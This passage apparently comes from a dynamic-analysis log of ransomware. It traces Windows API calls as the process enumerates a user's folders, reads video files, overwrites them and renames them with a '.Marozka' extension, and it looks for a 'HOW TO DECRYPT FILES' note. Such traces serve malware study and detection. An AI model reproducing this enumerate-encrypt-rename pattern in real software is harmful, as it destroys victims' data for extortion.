lpBuffer="C:\\Users\\FD1HVy\\OneDrive", lpFilePart=0x0) returned 0x18 [0058.539] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d848 [0058.539] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.539] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.540] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.540] FindClose (in: hFindFile=0xa7d848 | out: hFindFile=0xa7d848) returned 1 [0058.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.540] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Saved Games", lpFilePart=0x0) returned 0x1b [0058.540] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d748 [0058.540] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.541] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.541] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.541] FindClose (in: hFindFile=0xa7d748 | out: hFindFile=0xa7d748) returned 1 [0058.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.541] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Saved Games", lpFilePart=0x0) returned 0x1b [0058.541] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Saved Games\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7db48 [0058.541] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.542] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.542] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.542] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0058.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.542] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Favorites", lpFilePart=0x0) returned 0x19 [0058.542] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.542] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.543] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.543] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.543] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.543] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.543] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.543] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Favorites", lpFilePart=0x0) returned 0x19 [0058.544] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7db48 [0058.544] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.544] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.544] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.544] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.544] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.544] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.545] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Favorites\\Links", lpFilePart=0x0) returned 0x1f [0058.545] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dc08 [0058.545] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.545] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.545] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.545] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.546] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Favorites\\Links", lpFilePart=0x0) returned 0x1f [0058.546] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Favorites\\Links\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d708 [0058.546] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.546] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.546] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.546] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.546] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Searches", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Searches", lpFilePart=0x0) returned 0x18 [0058.546] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.547] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.547] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.548] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Searches", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Searches", lpFilePart=0x0) returned 0x18 [0058.548] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Searches\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.548] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.548] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.549] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.549] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.549] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.549] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.549] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.550] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos", lpFilePart=0x0) returned 0x16 [0058.550] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.550] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.550] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.550] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.550] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.551] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.551] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.552] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos", lpFilePart=0x0) returned 0x16 [0058.552] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.552] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.552] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.552] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.552] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.553] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.554] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.554] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.554] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.554] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", lpFilePart=0x0) returned 0x20 [0058.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.554] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\cwkf0.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.554] GetFileType (hFile=0x2e0) returned 0x1 [0058.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.554] GetFileType (hFile=0x2e0) returned 0x1 [0058.554] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x2006 [0058.555] ReadFile (in: hFile=0x2e0, lpBuffer=0x26a8db0, nNumberOfBytesToRead=0x2006, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x26a8db0*, lpNumberOfBytesRead=0x5beabc*=0x2006, lpOverlapped=0x0) returned 1 [0058.555] CloseHandle (hObject=0x2e0) returned 1 [0058.619] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0058.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0058.619] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", lpFilePart=0x0) returned 0x20 [0058.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0058.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\cwkf0.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.620] GetFileType (hFile=0x2e0) returned 0x1 [0058.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0058.620] GetFileType (hFile=0x2e0) returned 0x1 [0058.620] WriteFile (in: hFile=0x2e0, lpBuffer=0x26ffd48*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x26ffd48*, lpNumberOfBytesWritten=0x5beab0*=0x2010, lpOverlapped=0x0) returned 1 [0058.621] CloseHandle (hObject=0x2e0) returned 1 [0058.622] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi", lpFilePart=0x0) returned 0x20 [0058.622] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi.Marozka", lpFilePart=0x0) returned 0x28 [0058.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0058.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\cwkf0.avi"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81fda700, ftCreationTime.dwHighDateTime=0x1d4d19a, ftLastAccessTime.dwLowDateTime=0x4f56b110, ftLastAccessTime.dwHighDateTime=0x1d4d592, ftLastWriteTime.dwLowDateTime=0xe5ab6075, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x2010)) returned 1 [0058.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0058.622] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\cwkf0.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\CWKf0.avi.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\cwkf0.avi.marozka")) returned 1 [0058.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.708] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX", lpFilePart=0x0) returned 0x22 [0058.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d888 [0058.709] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.709] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.709] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.709] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.709] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.709] FindClose (in: hFindFile=0xa7d888 | out: hFindFile=0xa7d888) returned 1 [0058.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.710] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX", lpFilePart=0x0) returned 0x22 [0058.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db48 [0058.710] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.710] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.710] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.710] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.711] FindNextFileW (in: hFindFile=0xa7db48, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.711] FindClose (in: hFindFile=0xa7db48 | out: hFindFile=0xa7db48) returned 1 [0058.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.711] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", lpFilePart=0x0) returned 0x2b [0058.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\drja.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.711] GetFileType (hFile=0x2e0) returned 0x1 [0058.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.711] GetFileType (hFile=0x2e0) returned 0x1 [0058.711] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x1306b [0058.711] ReadFile (in: hFile=0x2e0, lpBuffer=0x2703688, nNumberOfBytesToRead=0x1306b, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x2703688*, lpNumberOfBytesRead=0x5bea48*=0x1306b, lpOverlapped=0x0) returned 1 [0058.712] CloseHandle (hObject=0x2e0) returned 1 [0058.734] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.734] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.735] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi", lpFilePart=0x0) returned 0x2b [0058.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0058.735] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ArkZk4pr2pX\\drjA.avi" (normalized: "c:\\users\\fd1hvy\\videos\\arkzk4pr2px\\drja.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.784] GetFileType (hFile=0x2e0) returned 0x1 [0058.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0058.784] GetFileType (hFile=0x2e0) returned 0x1 [0058.784] WriteFile (in: hFile=0x2e0, lpBuffer=0x27895d8*, nNumberOfBytesToWrite=0x13070, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x27895d8*, lpNumberOfBytesWritten=0x5bea3c*=0x13070, lpOverlapped=0x0) returned 1 [0058.796] CloseHandle (hObject=0x2e0) returned 1 [0058.799] GetFullPathNameW (in: 